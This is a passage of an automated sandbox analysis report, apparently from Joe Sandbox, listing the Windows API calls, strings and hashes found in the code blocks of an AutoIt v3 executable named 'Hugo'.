                                                                                                                                                                                                              • Opcode ID: b0eed068543d2da60f257844e01731011ba53bb4906ece9f243d3efdf554ef9e
                                                                                                                                                                                                              • Instruction ID: e5e2c536e37288bf999f8ac0c58f0939627457475ba4bad946cd79ced660f90d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0eed068543d2da60f257844e01731011ba53bb4906ece9f243d3efdf554ef9e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79626AB0508341CFC724CF14C495AAABBE0FF89354F14895EE8998B352DB75D946EF82

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1001 f135b3-f13623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F135E1
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F13602
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F13368,?), ref: 00F13616
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F13368,?), ref: 00F1361F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$CreateShow
                                                                                                                                                                                                              • String ID: AutoIt v3$edit
                                                                                                                                                                                                              • API String ID: 1584632944-3779509399
                                                                                                                                                                                                              • Opcode ID: d115cfb25a64bc24a4671ae9a72a79dadb7392d40d6e47920f2c51e9529d11b5
                                                                                                                                                                                                              • Instruction ID: 70596fd52d50e81f59816829511fbe29032bacdd6b157bb5a292ab2ff28bab6a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d115cfb25a64bc24a4671ae9a72a79dadb7392d40d6e47920f2c51e9529d11b5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43F0B7B16402DC7EE76557176C88E373EBDD7C7F50B00001AB905AA5A0E66A1851FEB0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F55287
                                                                                                                                                                                                                • Part of subcall function 00F18577: _wcslen.LIBCMT ref: 00F1858A
                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F16299
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                              • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                              • API String ID: 2289894680-4094128768
                                                                                                                                                                                                              • Opcode ID: 5b1af25628901ea80f27dbe3a8ed11a32a838e17078277646a2fc7e5bafa448c
                                                                                                                                                                                                              • Instruction ID: 4d0ae8fbe656115f5db2d6fe854bf82310030cb74ccd7cac71f6a0fa8c357ff2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b1af25628901ea80f27dbe3a8ed11a32a838e17078277646a2fc7e5bafa448c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7841B571408344AEC711EB60DC41ADF77ECAF84720F00462EF999920A1EB78D689EB93

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1053 f158cb-f158d6 1054 f15948-f1594a 1053->1054 1055 f158d8-f158dd 1053->1055 1057 f1593b-f1593e 1054->1057 1055->1054 1056 f158df-f158f7 RegOpenKeyExW 1055->1056 1056->1054 1058 f158f9-f15918 RegQueryValueExW 1056->1058 1059 f1591a-f15925 1058->1059 1060 f1592f-f1593a RegCloseKey 1058->1060 1061 f15927-f15929 1059->1061 1062 f1593f-f15946 1059->1062 1060->1057 1063 f1592d 1061->1063 1062->1063 1063->1060
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00F158BE,SwapMouseButtons,00000004,?), ref: 00F158EF
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00F158BE,SwapMouseButtons,00000004,?), ref: 00F15910
                                                                                                                                                                                                              • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00F158BE,SwapMouseButtons,00000004,?), ref: 00F15932
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                              • String ID: Control Panel\Mouse
                                                                                                                                                                                                              • API String ID: 3677997916-824357125
                                                                                                                                                                                                              • Opcode ID: 36d63cf16b39015f3736231b5dafc3be3b6502726235ceff54276aec42f90a8c
                                                                                                                                                                                                              • Instruction ID: b0f3d860f7330d6cad7149c993ca3b6af9c4d9c1afb9e2ab7a8acae370080203
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36d63cf16b39015f3736231b5dafc3be3b6502726235ceff54276aec42f90a8c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3115AB6510618FFDB218F64CC80AEEBBBCEF41B60B508419F802E7210E2319E81E761
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Variable must be of type 'Object'., xrefs: 00F648C6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                                              • API String ID: 0-109567571
                                                                                                                                                                                                              • Opcode ID: 20c615ed951ef0e79168dbc9b52cc7b7cb489330aee51eb5b503d721430c39bd
                                                                                                                                                                                                              • Instruction ID: fe8b065adc50eb0a8a7b56f8a04d9424697d522cbe3fa9acb862331f1c7d8fa2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 20c615ed951ef0e79168dbc9b52cc7b7cb489330aee51eb5b503d721430c39bd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FC2AD71E00215CFCB24DF58D894BADB7B1FF09320F24816AE905AB391D779AD85EB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00F215F2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1385522511-0
                                                                                                                                                                                                              • Opcode ID: 582c59f6c30f24a01e3091183ebc5aefea24276d931f939984af09d23ba5513c
                                                                                                                                                                                                              • Instruction ID: afb71ea591529d9d65564e569048765b210c1454cdf065a944d8acd0fc11eec3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 582c59f6c30f24a01e3091183ebc5aefea24276d931f939984af09d23ba5513c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66B29C76A08361CFCB24CF14E890A2AB7E1BF99310F14495DE9858B352DB35ED41EF92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00F309D8
                                                                                                                                                                                                                • Part of subcall function 00F33614: RaiseException.KERNEL32(?,?,?,00F309FA,?,00000000,?,?,?,?,?,?,00F309FA,00000000,00FD9758,00000000), ref: 00F33674
                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00F309F5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                              • String ID: Unknown exception
                                                                                                                                                                                                              • API String ID: 3476068407-410509341
                                                                                                                                                                                                              • Opcode ID: fbaa77ed2aaddf80d05e0a05588435277f4fea3af346cb33ed687b9dd7fdfe3b
                                                                                                                                                                                                              • Instruction ID: cf1ecd58cca724ccd8ad6bdf360e1571186f0ed5a2fc5488b9b91f5e4d2566cc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fbaa77ed2aaddf80d05e0a05588435277f4fea3af346cb33ed687b9dd7fdfe3b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95F04F34D0420DBB8B00BAA8EC66A9E776C5E00770F604162B914966E2EF74EA55B691
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00F98D52
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00F98D59
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 00F98F3A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 146820519-0
                                                                                                                                                                                                              • Opcode ID: aaeddd7091b0847e77eb66c5ddbf208c7707f327af0ef92e23b68ce5aa0389e8
                                                                                                                                                                                                              • Instruction ID: 5d366b0f660b157cb172905bbb8b298bc016159d14ff30f1921e9dae4f312134
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aaeddd7091b0847e77eb66c5ddbf208c7707f327af0ef92e23b68ce5aa0389e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC127E71908301DFDB14DF24C484B6ABBE5FF85368F04895DE8898B252CB35ED46DB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$_strcat
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 306214811-0
                                                                                                                                                                                                              • Opcode ID: ce26989580c478ab97baf0689e0483d583e4fb564db4ca74f616f831e57a200e
                                                                                                                                                                                                              • Instruction ID: 009c19f0ce468ec2629ea9419d22f26f1f085050f3408bc5715f83c43ee68510
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce26989580c478ab97baf0689e0483d583e4fb564db4ca74f616f831e57a200e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FA18B31604105EFDB18DF58C9D19A9BBA1FF45314B6184AEE84A8F692CB35ED42EFC0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F1327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F132AF
                                                                                                                                                                                                                • Part of subcall function 00F1327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F132B7
                                                                                                                                                                                                                • Part of subcall function 00F1327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F132C2
                                                                                                                                                                                                                • Part of subcall function 00F1327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F132CD
                                                                                                                                                                                                                • Part of subcall function 00F1327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F132D5
                                                                                                                                                                                                                • Part of subcall function 00F1327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F132DD
                                                                                                                                                                                                                • Part of subcall function 00F13205: RegisterWindowMessageW.USER32(00000004,?,00F12964), ref: 00F1325D
                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F12A0A
                                                                                                                                                                                                              • OleInitialize.OLE32 ref: 00F12A28
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 00F53A0D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1986988660-0
                                                                                                                                                                                                              • Opcode ID: 5374f51943874163b50a915df99c318d4c09cb0900c0ec5e5949d5341e5e6e6a
                                                                                                                                                                                                              • Instruction ID: d32fd0807af2b663db08739dbfe950db4ae014d4c5fd1fe23b3c93e2f7bdad1e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5374f51943874163b50a915df99c318d4c09cb0900c0ec5e5949d5341e5e6e6a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4717EB191138C8E87C8EF69AEE56553AEDFB49304348412AD009CB2B2FBB44545FF55
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F161A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F16299
                                                                                                                                                                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00F2FD36
                                                                                                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F2FD45
                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F6FE33
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3500052701-0
                                                                                                                                                                                                              • Opcode ID: a8369e3fe9f163dea10bb2fcdb351c253fcc10fe8a6f381da28a2c57638bd031
                                                                                                                                                                                                              • Instruction ID: 8dc24eb46352377beb470539dfebd87d531aa64f3f9236e7c78d293fedd53e10
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8369e3fe9f163dea10bb2fcdb351c253fcc10fe8a6f381da28a2c57638bd031
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9319871D04354AFEB72CF2498557E6BBECAF12314F0004AED5DA97141D3742A89EB51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,00F4894C,?,00FD9CE8,0000000C), ref: 00F48A84
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00F4894C,?,00FD9CE8,0000000C), ref: 00F48A8E
                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00F48AB9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2583163307-0
                                                                                                                                                                                                              • Opcode ID: 777f69ee1edccf836698c8c3a25bf2a8a2f7d865fdcb4109bac536d891aa201c
                                                                                                                                                                                                              • Instruction ID: 2e5e5a8c9cf08616cd206cfa9a0a0c3a6528fb9eeb7e3c29720567c95adc801c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 777f69ee1edccf836698c8c3a25bf2a8a2f7d865fdcb4109bac536d891aa201c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1010832E051A47BD6246374AC8677E7F454B82BB4F29012AFC149B1D2DFB88DC2B191
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00F497BA,FF8BC369,00000000,00000002,00000000), ref: 00F49744
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00F497BA,FF8BC369,00000000,00000002,00000000,?,00F45ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00F36F41), ref: 00F4974E
                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00F49755
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2336955059-0
                                                                                                                                                                                                              • Opcode ID: 552a66915518d1318946b9d9e74484ac6b94e4cd77b71db8dc75ddb01d8c211a
                                                                                                                                                                                                              • Instruction ID: 9220c2dec81f03156cef5898f5b2d9f95efc65bdb8a1d912a2197528f3b7fe9f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 552a66915518d1318946b9d9e74484ac6b94e4cd77b71db8dc75ddb01d8c211a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1901D833B24518ABCB159F99DC459AF7F29EB85330B240259FC119B190EA719D41EB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00F1F27B
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00F1F289
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1F29F
                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 00F1F2B1
                                                                                                                                                                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00F632D8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3288985973-0
                                                                                                                                                                                                              • Opcode ID: 4c8f76b4e2def877820c68bd2f64dc63f94b1b051054971770b683c78bc7ecc5
